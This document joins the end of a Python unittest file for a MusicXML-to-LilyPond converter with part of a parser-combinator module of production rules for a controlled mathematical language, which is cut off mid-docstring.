if hasattr(self, "item"):
self.assertEqual(self.lilystring, self.item.toLily())
class testMeasure(MeasureTests):
def setUp(self):
self.item = MeasureNode()
self.lilystring = " | "
class testMeasureNote(MeasureTests):
def setUp(self):
self.item = MeasureNode()
note = Note.Note()
note.pitch = Note.Pitch()
self.item.addNote(note)
self.lilystring = "c' | "
self.compile = True
self.wrappers = ["\\new Staff {", "}"]
Lily.setUp(self)
self.name = "measurenote"
class testMeasureChord(MeasureTests):
def setUp(self):
self.item = MeasureNode()
note = Note.Note()
note.pitch = Note.Pitch()
self.item.addNote(note)
note2 = Note.Note(chord=True)
note2.pitch = Note.Pitch()
self.item.addNote(note2, chord=True)
self.lilystring = "<c' c'> | "
self.compile = True
self.wrappers = ["\\new Staff {", "}"]
Lily.setUp(self)
self.name = "measurenotechord"
class testMeasureNoteWithGrace(MeasureTests):
def setUp(self):
self.item = MeasureNode()
note = Note.Note(type="quarter")
note.pitch = Note.Pitch()
grace = Note.GraceNote(first=True)
grace.last = True
note.addNotation(grace)
self.item.addNote(note)
self.item.RunVoiceChecks()
self.lilystring = "\grace { c'4 } | "
self.compile = True
self.wrappers = ["\\new Staff {", "}"]
Lily.setUp(self)
self.name = "measurenotegrace"
class testMeasureTempo(MeasureTests):
def setUp(self):
self.item = MeasureNode()
self.item.addDirection(Directions.Metronome(beat="quarter", min=60))
self.item.addNote(NoteNode())
self.lilystring = " \\tempo 4=60 | "
self.compile = True
self.wrappers = ["\\new Staff {", "}"]
Lily.setUp(self)
self.name = "measuretempo"
class testMeasureTwoDirections(MeasureTests):
def setUp(self):
self.item = MeasureNode()
self.item.addDirection(
Directions.Direction(
text="hello world",
placement="above"))
self.item.addDirection(Directions.Metronome(beat="quarter", min=60))
self.item.addNote(NoteNode())
self.lilystring = " ^\\markup { \"hello world\" } \\tempo 4=60 | "
self.compile = True
self.wrappers = ["\\new Staff {", "}"]
Lily.setUp(self)
self.name = "measuretwodirections"
class testMeasureTwoNotes(MeasureTests):
def setUp(self):
self.item = MeasureNode()
note = Note.Note()
note.pitch = Note.Pitch()
self.item.addNote(note)
note2 = Note.Note()
note2.pitch = Note.Pitch()
self.item.addNote(note2)
self.lilystring = "c' c' | "
self.compile = True
self.wrappers = ["\\new Staff {", "}"]
Lily.setUp(self)
self.name = "measuretwonotes"
class testMeasureOneNoteOneDirection(MeasureTests):
def setUp(self):
self.item = MeasureNode()
note = Note.Note()
note.pitch = Note.Pitch()
self.item.addDirection(
Directions.Direction(
text="hello",
placement="below"))
self.item.addNote(note)
self.lilystring = "c' _\\markup { \"hello\" } | "
self.compile = True
self.wrappers = ["\\new Staff {", "}"]
Lily.setUp(self)
self.name = "measurenotedirection"
class testPartialMeasure(MeasureTests):
def setUp(self):
self.item = MeasureNode()
self.item.partial = True
self.item.meter = Meter.Meter(beats=4, type=4)
note = Note.Note(type="quarter")
note.pitch = Note.Pitch()
self.item.addNote(note)
self.lilystring = "\\time 4/4 \partial 4 c'4 | "
self.compile = True
self.wrappers = ["\\new Staff {", "}"]
Lily.setUp(self)
self.name = "measurePartial"
class testPartialMeasureTwoNotes(Lily):
def setUp(self):
self.item = MeasureNode(partial=True)
self.item.meter = Meter.Meter(type=4, beats=4)
note = Note.Note()
note.SetType("quarter")
note.pitch = Note.Pitch(octave=4)
note2 = Note.Note()
note2.SetType("quarter")
note2.pitch = Note.Pitch(octave=4)
self.item.addNote(note)
self.item.addNote(note2)
Lily.setUp(self)
self.lilystring = "\\time 4/4 \partial 2 c'4 c'4 | "
class testPartialMeasureTwoNotesDifferentTypes(Lily):
def setUp(self):
self.item = MeasureNode(partial=True)
self.item.meter = Meter.Meter(type=4, beats=4)
note = Note.Note()
note.SetType("quarter")
note.pitch = Note.Pitch(octave=4)
note2 = Note.Note()
note2.SetType("half")
note2.pitch = Note.Pitch(octave=4)
self.item.addNote(note)
self.item.addNote(note2)
Lily.setUp(self)
self.lilystring = "\\time 4/4 \partial 2. c'4 c'2 | "
class testPartialMeasureThreeNotesDifferentTypes(Lily):
def setUp(self):
self.item = MeasureNode(partial=True)
self.item.meter = Meter.Meter(type=4, beats=4)
note = Note.Note(type="quarter")
note.pitch = Note.Pitch(octave=4)
note2 = Note.Note(type="half")
note2.pitch = Note.Pitch(octave=4)
note3 = Note.Note(type="eighth")
note3.pitch = Note.Pitch(octave=4)
self.item.addNote(note)
self.item.addNote(note2)
self.item.addNote(note3)
Lily.setUp(self)
self.lilystring = "\\time 4/4 \partial 2.. c'4 c'2 c'8 | "
class testPartialMeasureThreeNotesSameTypes(Lily):
def setUp(self):
self.item = MeasureNode(partial=True)
self.item.meter = Meter.Meter(type=4, beats=4)
note = Note.Note(type="quarter")
note.pitch = Note.Pitch(octave=4)
note2 = Note.Note(type="quarter")
note2.pitch = Note.Pitch(octave=4)
note3 = Note.Note(type="quarter")
note3.pitch = Note.Pitch(octave=4)
self.item.addNote(note)
self.item.addNote(note2)
self.item.addNote(note3)
Lily.setUp(self)
self.lilystring = "\\time 4/4 \partial 2. c'4 c'4 c'4 | "
class testMeasureOrder(Lily):
def setUp(self):
self.item = StaffNode()
measure1 = MeasureNode()
self.item.AddChild(measure1, index=1)
measure2 = MeasureNode()
measure3 = MeasureNode()
self.item.AddChild(measure2, index="X1")
self.item.AddChild(measure3, index=2)
self.lilystring = " % measure 1\n | \n\n % measure X1\n | \n\n % measure 2\n | \n\n"
class testMeasureTranspositionCalc(unittest.TestCase):
def setUp(self):
self.item = MeasureNode()
def testCalcUpWithChromatic(self):
self.item.transpose = BarlinesAndMarkers.Transposition(chromatic=2)
expected = "\\transpose c' d' {"
self.assertEqual(self.item.CalculateTransposition(), expected)
def testCalcUpWithDiatonic(self):
self.item.transpose = BarlinesAndMarkers.Transposition(diatonic=1)
expected = "\\transpose c' d' {"
self.assertEqual(self.item.CalculateTransposition(), expected)
def testCalcOctaveShift(self):
self.item.transpose = BarlinesAndMarkers.Transposition(octave=1)
expected = "\\transpose c' c'' {"
self.assertEqual(self.item.CalculateTransposition(), expected)
class testMeasureNoteWithShifter(Lily):
def setUp(self):
self.item = MeasureNode()
node = NoteNode()
node.GetItem().pitch = Note.Pitch(octave=4)
self.item.addNote(node)
dirnode = Directions.OctaveShift(amount=8, type="up")
self.item.addDirection(dirnode)
node2 = NoteNode()
node2.GetItem().pitch = Note.Pitch(octave=4)
self.item.addNote(node2)
Lily.setUp(self)
self.compile = True
self.wrappers = ["\\new Staff{a8 ", "c'8]}"]
self.lilystring = "c' \n\\ottava #-1\n c' | "
self.name = "noteOctaveShift"
class testShiftBeforeNote(unittest.TestCase):
def setUp(self):
self.item = MeasureNode()
dirnode = Directions.OctaveShift(amount=8, type="up")
self.item.addDirection(dirnode)
self.node = NoteNode()
self.node.GetItem().pitch = Note.Pitch(octave=2)
self.item.addNote(self.node)
def testLilystring(self):
value = "\n\\ottava #-1\n c, | "
self.assertEqual(value, self.item.toLily())
class testGraceAtStartOfMeasure(unittest.TestCase):
def setUp(self):
self.item = MeasureNode()
node = NoteNode()
self.note = Note.Note(type="quarter")
self.note.addNotation(Note.GraceNote())
self.note.pitch = Note.Pitch()
node.SetItem(self.note)
self.item.addNote(node)
self.item.RunVoiceChecks()
def testIsFirstGraceNote(self):
result = self.note.Search(Note.GraceNote)
self.assertTrue(result.first)
def testLilystring(self):
value = "\grace { c'4 } | "
self.assertEqual(value, self.item.toLily())
class testTwoVoicesMeasureNotePosition(Lily):
def setUp(self):
self.item = MeasureNode()
node = Note.Note(type="quarter")
node.pitch = Note.Pitch(octave=4)
self.item.addNote(node, voice=1)
self.item.addNote(node, voice=1)
self.item.Backup(1)
node2 = Note.Note(type="quarter")
node2.pitch = Note.Pitch(octave=4)
self.item.addNote(node2, voice=2)
Lily.setUp(self)
self.compile = True
self.wrappers = ["\\new Staff{a8 ", "c'8]}"]
self.lilystring = "<< % voice 1\n\\new Voice = \"one\"\n{\\voiceOne c'4 c'4 } % voice 2\n\\new Voice = \"two\"\n{\\voiceTwo r4 c'4 }>> | "
self.name = "noteOctaveShift"
def tearDown(self):
self.item = None
| 2.9375 | 3 |
2parser/production_rules.py | formalabstracts/CNL-CIC | 14 | 12759608 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Aug 22 17:00:38 2020
@author: <NAME>
production rules for Colada
Output of parsers will generally be an Etok.
Parser rules ending in _ produce a list of Etoks rather than one.
Inner functions f(acc) are treatments.
Inner functions f(item)->item are item transformers.
The parsers are generally implemented as function calls
rather than values. This gives uniform style and helps
to prevent infinite recursive expansion of parsers.
DEBUG. Not implemented: namespace, record, this_exists,
DEBUG. Currently inconsistent in when LexToken is converted to Etok. Duplicated effort
It is always performed by the Etok constructor.
It is always performed by Etok.rawupdate.
We may need it earlier when we apply v.update(), which raises an error on LexToken
"""
#import copy
#import msg
#import traceback
from exception import (ParseError, ParseNoCatch, ErrorItem)
import lib, word_lists
import tokenlib
import lexer
from tokenlib import Etok
#from ply.lex import LexToken #import ply.lex.LexToken as LexToken
import parser_combinator as c
from parser_combinator import (Parse,
next_word, next_any_word, next_value,
first_word,
first_phrase,
next_phrase,
pstream)
import sample
def first(*args):
return Parse.first(args)
def memo(f):
m = {}
def wrapper():
if f not in m:
m[f]= f()
return m[f]
return wrapper # f to run tests.
#def strip_delim_deprecated(acc):
# """treatment to remove outer delimiters
# Deprecated, because we assume inner material is an Etok.
# """
# (_,b,_) = acc
# return Etok.rawupdate(b,acc)
lookup_parse = {} # dictionary of parses, used for forward refs
def add_lookup_parse(nonterminal,value):
"""Add a new production rule to the lookup_parse dictionary.
The key is the nonterminal string.
The value is the parser associated with it.
value.nonterminal should
"""
v = value.name(nonterminal)
if nonterminal in lookup_parse:
lookup_parse[nonterminal].append(v)
else:
lookup_parse[nonterminal]= [v]
#get_lookup_parse_history = {} #for debugging.
#get_lookup_parse_history is here to keep tract of
# parsers that have been called but not implemented.
# Keys are all none. It functions as a set.
def get_lookup_parse(nonterminal):
"""The grammar is highly mutually recursive.
To make the implementation simpler, some of the recursion
has been relegated to a dictionary of parses: lookup_parse,
with keys given as nonterminal strings.
The parsers should return an Etok.
As new production rules are implemented, they are
added to the dictionary. The key is the nonterminal.
This function looks up the production rules
for a given key and forms them
into a parser according to the first successful rule.
There is a last resort production rule of letting each nonterminal
string represent a parser that parses the nonterminal as a literal
word string. This last resort rule might give strange behavior but it
is probably quite harmless. The last resort helps with debugging.
# DEBUG. Should not this fail, requiring a string in caps?
>>> pstream(get_lookup_parse('hello'),'hello and')
Etok(WORD,hello,'hello')
>>> pstream(get_lookup_parse('STATEMENT'),'[STATEMENT x > y]')
Etok(STATEMENT,backdoor2,'[ STATEMENT x > y ]')
"""
def f(acc):
return Etok.etok(acc).update({'name':nonterminal,'rule':'backdoor1'})
def f2(acc):
(_,(_,b),_)=acc
return Etok(name=nonterminal,etoks=b,raw=acc,rule='backdoor2')
backdoor1=Parse.next_token().if_rawvalue(nonterminal.upper()).treat(f,nonterminal)
backdoor2= c.bracket(Parse.next_token().if_rawvalue(nonterminal.upper()) + c.balanced()).treat(f2,nonterminal)
ps = [backdoor1,backdoor2] +lookup_parse.get(nonterminal,[])
return Parse.first(ps).name(nonterminal,production='lookup')
def build_word_net(phrase_list):
"""build a word net (discrimination net) from a list of phrases.
No normalization of words is performed, except case.
End of phrase is marked with {'':{}}. Eventually, we stop at key ''.
>>> build_word_net(['this and','this or','that and','this or that'])
{'this': {'and': {'': {}}, 'or': {'': {}, 'that': {'': {}}}}, 'that': {'and': {'': {}}}}
"""
def to_dict(ls):
if not(ls):
return {}
return {ls[0] : to_dict(ls[1:])}
def one_dict(phrase):
od = to_dict(phrase.lower().split()+[''])
return od
def add_dict(d1,od):
if not(od):
return d1
key = [*od][0] #first key
if key in d1:
# N.B. avoid equality to preserve scoping
d1.__setitem__(key,add_dict(d1[key],od[key]))
else:
d1.setdefault(key,od[key])
return d1
acc = {}
for phrase in phrase_list:
acc = add_dict(acc,one_dict(phrase))
return acc
def next_word_net(wn):
"""construct a parser for a word net.
Take the longest match.
>>> pstream(next_word_net(build_word_net(['aa bb cc','bb cc','aa bb cc dd'])),'aa bb cc dd ee')
[LexToken(WORD,'aa',1,0), LexToken(WORD,'bb',1,3), LexToken(WORD,'cc',1,6), LexToken(WORD,'dd',1,9)]
"""
def f(item):
try:
item1 = next_any_word().process(item)
if not(item1.acc.value in wn):
raise ParseError(ErrorItem(item,'next_word_net'))
except (StopIteration, ParseError) as pe:
if '' in wn:
return tokenlib.update([],item)
raise pe
acc1 = item1.acc
wn1 = wn[acc1.value]
item2 = next_word_net(wn1).process(tokenlib.update(None,item1))
return tokenlib.update([acc1]+item2.acc,item2)
return Parse(f,'next_word_net',sample=sample.word_net(wn))
#print(build_word_net(word_lists.transition))
def phrase_list_transition():
"""parser for transition phrases
>>> pstream(phrase_list_transition(),'therefore')
([LexToken(WORD,'therefore',1,0)], None)
"""
return (next_word_net(build_word_net(word_lists.transition)) + next_word('that').possibly())
def phrase_list_filler():
"""parser for filler words.
Examples:
'We know that'
'We see'
'See that'
"""
return (next_word('we').possibly() + first_word('put write have know see') +
next_word('that').possibly())
# case sensitive words
rawtype = next_any_word().if_rawvalue('Type')
rawsort = next_any_word().if_rawvalue('Sort')
rawprop = next_any_word().if_rawvalue('Prop')
rawtrue = next_any_word().if_rawvalue('True')
rawfalse = next_any_word().if_rawvalue('False')
period = next_value('.')
comma = next_value(',')
semicolon = next_value(';')
# :as means to 'coerce as'
colon_as = next_value(':')+next_word('as').possibly()
colon = next_value(':')
lit_dict = {
'a' : first_word('a an'), #indefinite
'article' : first_word('a an the'),
'assume': first_word('assume suppose'),
'axiom': first_word('axiom conjecture hypothesis equation formula'),
'choose': first_word('take choose pick'),
'contradiction' : first_word('contradiction contrary'),
'declare_mutual_inductive_decl': next_phrase('mutual inductive'),
'declare_mutual_inductive_def': next_phrase('mutual inductive def'),
'def': first_word('def definition'),
'defined_as' : first_phrase(['said to be','defined as','defined to be']),
'denote': first_phrase(['denote','stand for']),
'do': first_word('do does'),
'done': first_word('done quit'),
'equal': next_phrase('equal to'),
'exist': (next_word('there').possibly() + next_word('exist')).treat(lib.snd,'lit_exist'),
'false': first_word('off false no'),
'fix': first_word('fix let'),
'forall': (next_word('forall') | next_phrase('for all')),
'has': first_word('has have had'),
'iff': (first_phrase(['iff','if and only if']) |
(first_phrase(['is','are','be','to be']) + next_word('the').possibly() + next_word('predicate'))),
'is' : first_phrase(['is','are','be','to be']),
'lets': first_phrase(['let us','let','we can','we']),
'param': next_phrase('with parameter'),
'prove': first_word('prove show'),
'qed': first_word('end qed obvious literal'),
'satisfy' : first_phrase(['satisfy','give rise to','determine']),
'say': first_word('say write'),
'then': first_word('then therefore hence'),
'theorem': first_word('proposition theorem lemma corollary'),
'true': first_word('on true yes'),
'we-record': next_phrase('we record'),
'we-say': (next_word('we').possibly() +
first_word('say write') +
next_word('that').possibly()
),
'with': first_word('with of having'),
'with_property': next_phrase('with property'),
'wrong': next_phrase('it is wrong that'),
}
def lit(s):
"""parser generator for 's'-like words or phrases
canned phrases that have small variants
lit[w] gives parser for w-like words or phrases
Output Etok(name='lit', rule=s, value=None)
>>> pstream(lit('qed'),'obvious')
Etok(LIT,qed,'obvious')
"""
def f(acc):
return Etok('LIT',[],[acc],s)
if s =='record':
return (Parse.word('we').possibly() +
first_word('record register') +
Parse.word('identification').possibly() +
Parse.word('that').possibly()).treat(f,'that')
else:
return lit_dict[s].treat(f,s)
def read_keyword(s): #was lit_read
"""parser generator for s-like word.
Must be a single word.
Output is an etok with name = s, rule = response,
>>> pstream(read_keyword('assoc'),'right')
Etok(ASSOC,right,'right')
"""
def f(acc):
return Etok(name=s.upper(),etoks=[],raw=acc,rule=acc.value)
local_lit_dict = {
'sort': (rawtype | rawsort),
'assoc': first_word('left right no'),
'field_key': first_word('coercion notationless notation parameter type call'), #renamed map -> call
'document': first_word('document article section subsection subsubsection subdivision division'),
'end_document': first_word('endsection endsubsection endsubsubsection enddivision endsubdivision')
}
if s == 'doc':
return (local_lit_dict['document'] | local_lit_dict['end_document']).treat(f,'doc')
if s == 'location':
return Parse.first([local_lit_dict['document'],lit_dict['theorem'],lit_dict['axiom']]).treat(f,'location')
return local_lit_dict[s].treat(f,s)
def lit_any():
def f(acc):
return Etok(name='any',etoks=acc,raw=acc)
return (first_phrase(['each and every','some and every']) | first_word('every each all any some no')).treat(f,'any')
def cs_brace(cs_parse):
"""control sequence parser including arguments in braces.
Etok cs_parse is used to parse cs and
Etok expr to parse each braced arg.
Output: Etok(name='cs_brace') etoks=(cs_brace,braces).
>>> pstream(cs_brace(next_any_word()),'cs {TERM} {TERM} c')
Etok(cs_brace,word,'cs { TERM } { TERM }')
"""
def f(acc):
(cs,bs)=acc
bs = [b for (_,b,_) in bs]
return Etok(name='cs_brace',etoks=(cs,bs),raw=acc,rule=cs_parse.nonterminal)
return (cs_parse + c.brace(expr()).many()).treat(f,'cs_brace')
# case_sensitive_word -> use next_value(s)
@memo
def atomic():
"""parser for atomic identifiers,
converting words and integers as needed
Atomic identifiers cannot be a single letter (a short var)
wordlike atomic identifiers are modulo case-sing-syn.
but hierarchical identifiers are always case sensitive.
Integers are included for section numbers in labels.
output Etok
>>> pstream(atomic(),'HELLO')
Etok(ATOMIC,HELLO,'HELLO')
>>> pstream(atomic(),'the')
Etok(ATOMIC,the,'the')
"""
def f(acc):
if acc.type == 'WORD':
rule = c.synonymize(acc.value)
else:
rule = acc.value
return Etok(name='ATOMIC',etoks=[],raw=[acc],rule=rule)
return Parse.next_token().if_types(['INTEGER','WORD','ATOMIC_IDENTIFIER']).name('atomic').treat(f,'atomic')
@memo
def label():
return atomic()
# no memo, parameter
def primitive(primitive_nonterminal):
def f(item):
if not(primitive_nonterminal in word_lists.prim_list):
raise(ParseNoCatch(ErrorItem(item,primitive_nonterminal,'undeclared primitive')))
return get_lookup_parse(primitive_nonterminal).process(item)
return Parse(f,primitive_nonterminal,'!')
@memo
def section_label():
"""Section label.
Output Etok.etoks = [section,label?]
>>> pstream(section_label(),'Section 3.')
Etok(section_label,'section 3 .')
"""
def f(acc):
(e,_) = acc
return Etok(name='section_label',etoks=e,raw=acc)
def section_tag():
return (read_keyword('doc'))
return (section_tag() + label().possibly() + period).name('section_label').treat(f,'section_label')
class Instruction:
"""Construct a parser that creates an Etok for a given instruction.
There are misc data types: synonym, string, bool, int.
dictionary keys:
name : 'instruction'
rule : instruction keyword
misc : None, synlist, str, bool, int depending on the type
production : 'instruction'
rawvalue : input tokens,
keyword : string indicating instruction,
value : None, synlist, str, bool, int depending on the type.
"""
def _param_misc(tok):
if not(tok):
return None
if tok.type == 'INTEGER':
return int(tok.value)
if tok.value.lower() in ['yes','true','on']:
return True
if tok.value.lower() in ['no','false','off']:
return False
return tok.value
def _expand_slashdash(vs):
"""expanding synonyms
e.g. word/-ing is short for word/wording
>>> Instruction._expand_slashdash('work /- ing effort / workaround'.split())
['work', 'working', 'effort', 'workaround']
"""
for i in range(len(vs)-1):
if vs[i]== '/-':
vs[i]= '/'
vs[i+1]= vs[i-1]+vs[i+1]
return [v for v in vs if v != '/']
def _syn():
"""parsing synonyms
>>> pstream(Instruction._syn(),'aa/bb,cc/-dd,ee/ff')
[[LexToken(WORD,'aa',1,0), LexToken(SYMBOL,'/',1,2), LexToken(WORD,'bb',1,3)], ...
"""
def f(acc):
return acc[0::2]
def p(tok):
return tok.value in ['/','/-'] or c.can_wordify(tok)
synlist = Parse.next_token().if_test(p).plus()
return c.plus_andcomma(synlist).treat(f,'_syn')
def _treat_syn(acc):
"""build dict for synonyms.
input acc should contain the syn lists in the form
output by _syn.
This function will expand the slashes.
Output Etok(instruction,synonym,...)
"""
#acc11 = acc[1][1]
tt=[Instruction._expand_slashdash([t.value for t in ac]) for ac in acc]
return Etok(name='instruction',etoks=[],raw=acc,rule='synonym',misc=tt)
#d = {'production':'instruction',
# 'raw':lib.flatten(acc),
# 'keyword':'synonym'
# }
#acc11 = acc[1][1]
#d['value']=[Instruction._expand_slashdash([t.value for t in ac]) for ac in acc11]
#return d
def syn():
"""Synonym parser,
output is a fully treated Etok(instruction,synonym,...)
"""
return Instruction._syn().treat(Instruction._treat_syn)
def _treat_instruct(acc):
(_,(keyword,ls),_) = acc
return Etok(name='instruction',etoks=[],raw=acc,rule=keyword.value,misc=Instruction._param_misc(ls))
#{'production':'instruction',
# 'raw':lib.flatten(acc),
# 'keyword':keyword.value,
# 'value':Instruction._param_misc(ls)}
_keywords = """exit timelimit printgoal dump
ontored read library error warning"""
_keyword_instruct = (first_word(_keywords) +
Parse.next_token().possibly())
def instruction():
"""parsing instructions
>>> pstream(Instruction.instruction(),'[exit 1]')
Etok(instruction,exit,'[ exit 1 ]')
>>> pstream(Instruction.instruction(),'[read filename]')
Etok(instruction,read,'[ read filename ]')
>>> pstream(Instruction.instruction(),'[synonym another/extras, yet/-s]')
Etok(instruction,synonym,'[ synonym another / extra yet /- s ]')
"""
def f(acc):
(_,(_,s),_)=acc
return Etok.rawupdate(s, acc)
return (c.bracket(next_word('synonym') + Instruction.syn()).treat(f) |
c.bracket(Instruction._keyword_instruct).treat(Instruction._treat_instruct))
@memo
def expr():
"""parse for expression (term, type, or prop).
Output Etok(expr,...)
>>> pstream(expr(),'TERM')
Etok(expr,term,'TERM')
"""
def f1(nonterminal): #currying
def f(acc):
return Etok('expr',etoks=acc.etoks,raw=acc.raw,rule=nonterminal,misc=acc.misc,altrepr=acc.altrepr)
return f
def get(nonterminal):
return get_lookup_parse(nonterminal).treat(f1(nonterminal),nonterminal)
return first(
get('general_type'),
get('term'),
get('prop'),
get('proof_expr'),
get('sort_expr')
)
@memo
def colon_sort():
def f(acc):
((_,a),e) = acc
if not a:
return Etok.rawupdate(e,acc)
return Etok('coerce_as',etoks=[e],raw=acc)
return (colon_as + get_lookup_parse('sort_expr')).treat(f,'colon_sort')
@memo
def opt_colon_sort():
return colon_sort().possibly()
@memo
def colon_type():
"""Parse a colon then a post_colon_type.
output Etok
>>> pstream(colon_type(),':POST_COLON_TYPE')
Etok(post_colon_type,backdoor1,': POST_COLON_TYPE')
"""
def f(acc):
((_,a),e) = acc
if not a:
return Etok.rawupdate(e,acc)
return Etok('coerce_as',etoks=[e],raw=acc)
return (colon_as + get_lookup_parse('post_colon_type')).treat(f,'colon_type')
@memo
def opt_colon_type():
return colon_type().possibly()
@memo
def opt_colon_sort_or_type():
return (colon_sort() | colon_type()).possibly()
@memo
def var():
"""parser for a single variable.
Accepts a single token that is a variable.
>>> pstream(var(),'x')
Etok(VAR,x,'x')
"""
return c.next_type('VAR').name('VAR').treat(Etok.etok,'VAR')
def annotated(p):
"""
Parser for annotated p in parentheses.
p must output an Etok.
Input is wrapped in parentheses.
Annotation is colon_type or None
Parser output Etok('annotated'...)
etoks:(p,colon_type)
Sample input to parser:
(x : A)
>>> pstream(annotated(var()),'(x:POST_COLON_TYPE)')
Etok(annotated,...,'( x : POST_COLON_TYPE )')
"""
def f(acc):
(_,vs,_) = acc
#if not ann:
# return Etok.rawupdate(v,acc) # cannot guarantee that v is a single Etok.
return Etok('annotated',etoks=vs,raw=acc,rule=p.nonterminal)
return c.paren(p + opt_colon_sort_or_type()).treat(f,'annotated')
@memo
def annotated_var():
return annotated(var())
def annotateds(p):
"""
Parser for annotated list
p must output a list of Etoks.
Input is wrapped in parentheses.
Output Etok.etoks:([p],post_colon_type or None)
Sample input:
(x y z : A)
(u v)
>>> pstream(annotateds(var().plus()),'(x y:POST_COLON_TYPE)')
Etok(annotateds,...,'( x y : POST_COLON_TYPE )')
"""
def f(acc):
(_,(vs,ann),_) = acc
return Etok('annotateds',etoks=(vs,ann),raw=acc,rule=p.nonterminal)
return c.paren(p + opt_colon_type()).treat(f,'annotateds')
@memo
def annotated_vars():
return annotated(var().plus())
@memo
def tvar():
"""
>>> pstream(tvar(),'x')
Etok(VAR,x,'x')
>>> pstream(tvar(),'(x : POST_COLON_TYPE)')
Etok(annotated,VAR,'( x : POST_COLON_TYPE )')
"""
return var() | annotated_var()
@memo
def assign_expr():
"""parser for := followed by an expression
The output is the expression at Etok
>>> pstream(assign_expr(),':= GENERAL_TYPE')
Etok(expr,general_type,':= GENERAL_TYPE')
"""
def f(acc):
(_,e) = acc
return Etok.rawupdate(e,acc)
return (next_value(':=') + expr()).name('assign_expr').treat(f,'assign_expr')
def var_or_atomic(omit=[]):
"""parser for a var or atomic identifier.
The value is not allowed to lie in omit.
Output of parser is a single Etok of one of those types."""
def p(tok):
return not(tok.value in omit)
return (var() | atomic()).if_test(p).name('var_or_atomic')
def var_or_atomics_(omit=[]):
"""parser for a sequence of one or more var or atomics
>>> pstream(var_or_atomics_(),'x uu vv THE RUN.TO')
[Etok(VAR,x,'x'), ... Etok(ATOMIC,THE,'THE')]
"""
return var_or_atomic(omit=[]).plus()
@memo
def var_or_atomic_or_blank():
"""parser for var or atomic or _.
The parser output is a single token that is one of those types."""
return var_or_atomic() | next_value('_').treat(Etok.etok)
@memo
def brace_assign():
"""
input semi-separated list of assignments within braces.
output is a Etok(brace_assign)
Etok.etoks: list of (lhs,type annotation,assigned expr)
the last two can be None.
>>> pstream(brace_assign(),'{ x := TERM ; y : POST_COLON_TYPE := TERM }')
Etok(brace_assign,'{ x := TERM ; y : POST_COLON_TYPE := TERM }')
"""
#def f_item(acc):
# ((v,o),p) = acc
# return (v,o,p)
#n_acc = []
#def f_brace(acc):
# nonlocal n_acc
# (_,b,_) = acc
# n_acc = acc # keep full list of tokens
# return b[0::2]
#def f_final(acc):
# return Etok(name='brace_assign',etoks=acc,raw=n_acc)
#def brace_assign_item():
# return (var_or_atomic_or_blank()+ opt_colon_type() + assign_expr().possibly()).name('brace_assign_item').treat(f_item)
#return c.brace_semif().treat(f_brace,'f_brace').reparse_list(brace_assign_item()).treat(f_final,'brace_assign')
def f(acc):
(_,ps,_)=acc
ps = [(v,o,p) for ((v,o),p) in ps[0::2]]
return Etok(name='brace_assign',etoks=ps,raw=acc)
p = (var_or_atomic_or_blank()+ opt_colon_type() + assign_expr().possibly()).name('brace_assign_item')
return c.brace(p.plus(semicolon)).treat(f,'brace_assign_item')
@memo
def brace_noassign():
"""
input semi-separated list of var_or_atomics with possible typing
output is an Etok(brace_noassign)
Etok.etoks list of (lhs,typ annotation or None)
>>> pstream(brace_noassign(),'{x:POST_COLON_TYPE;y}')
Etok(brace_noassign,'{ x : POST_COLON_TYPE ; y }')
"""
#n_acc = []
#def f_brace(acc):
# nonlocal n_acc
# (_,b,_) = acc
# n_acc = acc
# return b[0::2] #remove semi
#def f_final(acc):
# return Etok(name='brace_noassign',etoks=acc,raw=n_acc)
#def brace_noassign_item():
# return (var_or_atomics_() + opt_colon_type())
#return c.brace_semif().treat(f_brace,'f_brace').reparse_list(brace_noassign_item()).treat(f_final,'brace_noassign')
def f(acc):
(_,ps,_)=acc
ps = ps[0::2]
return Etok(name='brace_noassign',etoks=ps,raw=acc)
p = (var_or_atomics_() + opt_colon_type()).name('brace_noassign_item')
return c.brace(p.plus(semicolon)).treat(f,'brace_noassign_item')
@memo
def app_args():
"""
parses the arguments of a function application.
output Etok.toks (brace_assign?,[expr])
>>> pstream(app_args(),'{ x:= TERM } TIGHTEST_EXPR TIGHTEST_EXPR ...')
Etok(app_args,'{ x := TERM } TIGHTEST_EXPR TIGHTEST_EXPR')
"""
def f(acc):
return Etok(name='app_args',etoks=acc,raw=acc)
return (brace_assign().possibly() + get_lookup_parse('tightest_expr').many()).treat(f,'app_args')
def casemark(s):
"""Used to mark different cases in parsing, for later
case-based treatment"""
def f(acc):
return (s,acc)
return f
def annotated_args(omit=[]):
"""
parse formal parameters of a function
input variables
omit = list of banned names for variables and atomics
output Etok(annotated_args) , etoks = man
>>> pstream(annotated_args(),'x vv tt')
Etok(annotated_args,'x vv tt')
>>> pstream(annotated_args(),'x (uu v w : POST_COLON_TYPE) y')
Etok(annotated_args,'x ( uu v w : POST_COLON_TYPE ) y')
"""
def f(acc):
return Etok(name='annotated_args',etoks=acc,raw=acc)
return (var_or_atomic(omit) | annotateds(var_or_atomics_(omit))).many().treat(f,'annotated_args')
def args_template(omit=[]):
"""
input parse braced, annotated arguments of
formal function args
output Etok(args_template), can be devoid of data
>>> pstream(args_template(),'{ x ; y ; z} r (s t) v')
Etok(args_template,'{ x ; y ; z } r ( s t ) v')
>>> pstream(args_template(),'')
Etok(args_template,'')
"""
def f(acc):
return Etok(name='args_template',etoks=acc,raw=acc)
return (brace_noassign().possibly() + annotated_args(omit)).treat(f,'args_template')
def nonempty_args_template(omit=[]):
"""This is the same as args_template, except it must
contain data.
>>> pstream(nonempty_args_template(),'{ x ; y ; z} r (s t) v')
Etok(args_template,'{ x ; y ; z } r ( s t ) v')
>>> try:
... pstream(nonempty_args_template(),'')
... except:
... 'invalid'
'invalid'
>>> pstream(nonempty_args_template(omit=['y']),'x y')
Etok(args_template,'x')
"""
def p(etok):
return (etok.rawstring())
return args_template(omit).if_test(p)
@memo
def tightest_arg():
"""
This allows too much. We should restrict to admissible patterns.
>>> pstream(tightest_arg(),'TIGHTEST_EXPR')
Etok(tightest_expr,backdoor1,'TIGHTEST_EXPR')
>>> pstream(tightest_arg(),'(x uu : sort_expr)')
Etok(tightest_arg,'( x uu : sort_expr )')
"""
def f(acc):
(_,(vs,o),_)=acc
return Etok(name='tightest_arg',etoks=(vs,o),raw=acc)
return (get_lookup_parse('tightest_expr') |
c.paren(var_or_atomic().atleast(2) +
opt_colon_sort_or_type()).treat(f,'tightest_arg'))
@memo
def tightest_args():
return brace_noassign().possibly() + tightest_arg().many()
@memo
def holding_vars():
""" input
This is experimental, used to indicate unbound (free) variables in
a sum or list comprehensive.
